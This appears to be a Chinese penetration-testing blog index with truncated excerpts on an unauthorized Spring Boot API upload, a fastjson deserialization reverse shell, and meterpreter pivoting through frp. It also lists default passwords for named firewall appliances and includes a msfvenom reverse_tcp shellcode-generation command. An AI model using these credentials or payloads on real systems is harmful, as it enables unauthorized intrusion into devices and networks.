一次工作中的接口未授权访问漏洞案例
一次工作中的接口未授权访问漏洞案例简单的爬虫爬到了这个页面让我想起了springboot这里可以发现是不允许使用GET方法去传输数据那么就换成POST经过测试。POST访问,不配合参数,是可以实现的那么就加入上传测试数据--------No7Qr1Content-Disposition: form-data; name="file"; filename="..jpg"Content-Type: image/file 43242...
fastjson反序列化漏洞反弹shell案例
fastjson反序列化漏洞反弹shell案例现在最新的fastjson漏洞也出来了最初是工作中的一次漏洞挖掘过程目标:http://www.xxx.net/#/站点功能很多分站也很多挖漏洞思路还是那些套路吗Site:网站二级域名爆破,旁注,C段,端口,服务,登陆接口逻辑,等等 解析IP,查询旁站,发现一个二级域名在API接口发现了http://www.xxx.net/api/hotProduct/list问题貌似是json数据于是尝试json DNSLOG.cn构...
各类安全设备弱密码排查列表
各类安全设备弱密码排查列表天融信防火墙 用户名:superman 密码:talent天融信防火墙 用户名:superman 密码:talent!23 联想网御防火墙 用户名:admin 密码:leadsec@7766、administrator、bane@7766深信服防火墙 用户名:admin 密码:admin启明星辰 用户名:admin 密码:bane@7766 用户名:admin 密码:admin@123juniper 用户名:netscreen 密码:netscree...
windows 2008 r2 meterpreter转发内网实例
windows 2008 r2 meterpreter转发内网实例我们已经讲过了reDuh转发提权内网实例,今天带来一篇使用msf的meterpreter转发实例准备工具:frp内网穿透工具一台VPS linux主机,一台kali的系统,一台window的系统使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XX LPORT=2333 -f c生成一个shellcode,在Microsoft Visual C++进...